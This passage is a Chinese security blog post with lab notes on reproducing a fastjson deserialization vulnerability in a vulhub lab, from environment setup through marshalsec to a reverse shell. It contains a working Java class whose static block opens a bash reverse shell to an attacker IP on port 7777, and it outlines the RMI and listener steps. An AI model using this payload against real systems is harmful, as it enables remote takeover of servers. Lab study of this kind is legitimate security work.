笔记丨fastjson反序列化从0-反弹shell

admin 2025年3月4日14:06:59评论11 views字数 1819阅读6分3秒阅读模式
一、避坑guide
1、maven环境ERROR问题
2、docker无法连接网络问题
3、marshalsec编译问题
二、环境准备
1、centos7虚拟机两台(分配两个IP:一个靶机,一个攻击机)
2、攻击机上安装Java1.8、maven3.5.2、marshalsec(这是我的环境)
3、靶机上安装docker、docker-compose、vulhub靶场
三、环境配置
Java安装yum install -y java-1.8.0-openjdk.x86_64java -versionmeaven安装(pom.xml需要新增一行标签)wget http://repos.fedorapeople.org/repos/dchen/apache-maven/epel-apache-maven.repo -O /etc/yum.repos.d/epel-apache-maven.repoyum -y install apache-mavenmvn -vmarshalsec-master编译mvn clean package -DskipTestscd target/出现下边的表示编译成功
drwxr-xr-x. 2 root root        62月  2810:44 archive-tmpdrwxr-xr-x. 3 root root       242月  2810:43 classesdrwxr-xr-x. 3 root root       252月  2810:43 generated-sourcesdrwxr-xr-x. 3 root root       302月  2810:43 generated-test-sources-rw-r--r--. 1 root root 42566378 2月  28 10:44 marshalsec-0.0.3-SNAPSHOT-all.jar-rw-r--r--. 1 root root   101794 2月  28 10:44 marshalsec-0.0.3-SNAPSHOT.jardrwxr-xr-x. 2 root root       282月  2810:44 maven-archiverdrwxr-xr-x. 3 root root       352月  2810:43 maven-statusdrwxr-xr-x. 2 root root       312月  2810:43 test-classes
docker安装直接去阿里镜像站无脑安装docker-compose安装curl -L https://github.com/docker/compose/releases/download/v2.33.1/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-composechmod +x /usr/local/bin/docker-composedocker-compose --versionvulhub下载git clone https://github.com/vulhub/vulhub.git
四、漏洞复现
1、启fastjson环境
笔记丨fastjson反序列化从0-反弹shell
2、下边shell.java编译成shell.class
// javac GetShell.javaimport java.lang.Runtime;import java.lang.Process;public class shell {    static {        try {            Runtime rt = Runtime.getRuntime();            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/10.0.1.12/7777 0>&1"};            Process pc = rt.exec(commands);            pc.waitFor();        } catch (Exception e) {            // do nothing        }    }}
2、启HTTP服务把远程恶意class放到外网能访问到
笔记丨fastjson反序列化从0-反弹shell
笔记丨fastjson反序列化从0-反弹shell
3、启rmi服务监听远程恶意shell类
笔记丨fastjson反序列化从0-反弹shell
4、启nc监听7777端口
笔记丨fastjson反序列化从0-反弹shell
5、payload发起攻击
笔记丨fastjson反序列化从0-反弹shell
6、反弹shell上线
笔记丨fastjson反序列化从0-反弹shell
五、附图
笔记丨fastjson反序列化从0-反弹shell
结语:你拿多少root你都拿不下她心里的root,回头看就是一Joker,收收心找个电子厂上班了哈~

原文始发于微信公众号(喵星安全研究所):笔记丨fastjson反序列化从0-反弹shell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月4日14:06:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   笔记丨fastjson反序列化从0-反弹shellhttps://cn-sec.com/archives/3794100.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息